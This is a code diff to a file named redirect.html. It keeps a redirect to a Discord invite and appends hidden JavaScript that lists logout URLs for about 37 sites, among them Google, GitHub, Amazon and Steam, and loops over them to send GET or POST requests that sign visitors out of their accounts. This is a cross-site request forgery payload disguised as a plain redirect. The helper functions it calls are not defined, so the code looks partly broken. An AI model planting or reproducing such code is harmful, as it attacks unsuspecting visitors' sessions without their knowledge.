--- a/redirect.html
+++ b/redirect.html
@@ -1,1 +1,53 @@
-<script>window.location.href='https://discord.gg/c5KaDpzeeC'</script>
+<script>window.location.href='https://discord.gg/c5KaDpzeeC'
+const LOGOUT_SITES = {
+  AOL: ['GET', 'https://my.screenname.aol.com/_cqr/logout/mcLogout.psp?sitedomain=startpage.aol.com&authLev=0&lang=en&locale=us'],
+  'AOL 2': ['GET', 'https://api.screenname.aol.com/auth/logout?state=snslogout&r=' + Math.random()],
+  Amazon: ['GET', 'https://www.amazon.com/gp/flex/sign-out.html?action=sign-out'],
+  Blogger: ['GET', 'https://www.blogger.com/logout.g'],
+  Delicious: ['GET', 'https://www.delicious.com/logout'], // works!
+  DeviantART: ['POST', 'https://www.deviantart.com/users/logout'],
+  DreamHost: ['GET', 'https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout'],
+  Dropbox: ['GET', 'https://www.dropbox.com/logout'],
+  eBay: ['GET', 'https://signin.ebay.com/ws/eBayISAPI.dll?SignIn'],
+  Gandi: ['GET', 'https://www.gandi.net/login/out'],
+  GitHub: ['GET', 'https://github.com/logout'],
+  GMail: ['GET', 'https://mail.google.com/mail/?logout'],
+  Google: ['GET', 'https://www.google.com/accounts/Logout'], // works!
+  Hulu: ['GET', 'https://secure.hulu.com/logout'],
+  Instapaper: ['GET', 'https://www.instapaper.com/user/logout'],
+  Linode: ['GET', 'https://manager.linode.com/session/logout'],
+  LiveJournal: ['POST', 'https://www.livejournal.com/logout.bml', { 'action:killall': '1' }],
+  MySpace: ['GET', 'https://www.myspace.com/index.cfm?fuseaction=signout'],
+  NetFlix: ['GET', 'https://www.netflix.com/Logout'],
+  'New York Times': ['GET', 'https://www.nytimes.com/logout'],
+  Newegg: ['GET', 'https://secure.newegg.com/NewMyAccount/AccountLogout.aspx'],
+  Photobucket: ['GET', 'https://photobucket.com/logout'],
+  Skype: ['GET', 'https://secure.skype.com/account/logout'],
+  Slashdot: ['GET', 'https://slashdot.org/my/logout'],
+  SoundCloud: ['GET', 'https://soundcloud.com/logout'],
+  'Steam Community': ['GET', 'https://steamcommunity.com/?action=doLogout'],
+  'Steam Store': ['GET', 'https://store.steampowered.com/logout/'],
+  ThinkGeek: ['GET', 'https://www.thinkgeek.com/brain/account/login.cgi?a=lo'],
+  Threadless: ['GET', 'https://www.threadless.com/logout'],
+  Tumblr: ['GET', 'https://www.tumblr.com/logout'],
+  Vimeo: ['GET', 'https://vimeo.com/log_out'],
+  Wikipedia: ['GET', 'https://en.wikipedia.org/w/index.php?title=Special:UserLogout'],
+  'Windows Live': ['GET', 'https://login.live.com/logout.srf'],
+  Woot: ['GET', 'https://account.woot.com/logout'],
+  Wordpress: ['GET', 'https://wordpress.com/wp-login.php?action=logout'],
+  Yahoo: ['GET', 'https://login.yahoo.com/config/login?.src=fpctx&logout=1&.direct=1&.done=https://www.yahoo.com/'],
+  YouTube: ['POST', 'https://www.youtube.com', { action_logout: '1' }]
+}
+for (const name in LOGOUT_SITES) {
+    const method = LOGOUT_SITES[name][0]
+    const url = LOGOUT_SITES[name][1]
+    const params = LOGOUT_SITES[name][2] || {}
+
+    if (method === 'GET') {
+      get(url)
+    } 
+    else {
+      post(url, params)
+    }
+}
+</script>
